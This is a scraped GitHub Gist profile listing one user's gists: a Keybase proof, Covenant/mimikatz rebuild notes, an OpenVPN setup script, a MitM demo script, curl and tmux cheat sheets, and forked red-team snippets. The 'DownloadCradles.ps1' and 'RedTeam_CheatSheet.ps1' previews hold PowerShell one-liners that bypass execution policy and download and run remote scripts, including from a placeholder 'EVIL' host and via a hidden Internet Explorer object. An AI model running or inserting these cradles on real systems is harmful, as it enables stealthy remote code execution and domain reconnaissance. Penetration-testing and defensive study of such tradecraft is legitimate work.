Skip to content

Instantly share code, notes, and snippets.

### Keybase proof
I hereby claim:
* I am waynejlee on github.
* I am waynejlee (https://keybase.io/waynejlee) on keybase.
* I have a public key ASA-h3VHKZnryiIa8qwTusnhIouIsUwE96k1dNJRK_FSYgo
To claim this, I am signing this object:
@WayneJLee
WayneJLee / CovenantNotes.md
Last active December 7, 2020 14:17
Notes on Covenant

Updating mimikatz to the latest version

  1. Git clone the mimikatz repository
  2. Build with Second_Release_PowerShell for both x86 and x64
  3. Replace the DLLs below with the newly compiled ones
    • /Covenant/Data/EmbeddedResources/SharpSploit.Resources.powerkatz_x64.dll
  • /Covenant/Data/EmbeddedResources/SharpSploit.Resources.powerkatz_x86.dll
@WayneJLee
WayneJLee / init-ovpn.sh
Created August 27, 2020 14:45
Headless install and configuration of OpenVPN Access Server
#!/bin/bash
# Originally from https://github.com/Azure/azure-quickstart-templates/blob/master/openvpn-access-server-ubuntu/install_openvpn_access_server.sh
userPassword=$1
# adding official OpeenVPN Access Servere repository
sudo apt update && sudo apt -y install ca-certificates wget net-tools
wget -qO - https://as-repository.openvpn.net/as-repo-public.gpg | sudo apt-key add -
sudo sh -c 'echo "deb http://as-repository.openvpn.net/as/debian bionic main">>/etc/apt/sources.list.d/openvpn-as-repo.list'
@WayneJLee
WayneJLee / mitm_demo.sh
Created November 30, 2019 17:08
Script to set up MitM demo - Vigilant Asia
#!/bin/bash
RED='\033[1;31m'
NoC='\033[0m'
echo -e "MitM by ${RED}Vigilant Asia${NoC}"
# Usage
if [ "$1" = "" ]; then
echo "Please specify target IP"
@WayneJLee
WayneJLee / DownloadCradles.ps1
Created October 7, 2019 04:03 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@WayneJLee
WayneJLee / curl.md
Created September 13, 2019 19:22 — forked from subfuzion/curl.md
curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

@WayneJLee
WayneJLee / tmux-cheatsheet.markdown
Created June 27, 2019 01:59 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@WayneJLee
WayneJLee / RedTeam_CheatSheet.ps1
Created June 16, 2019 07:33 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"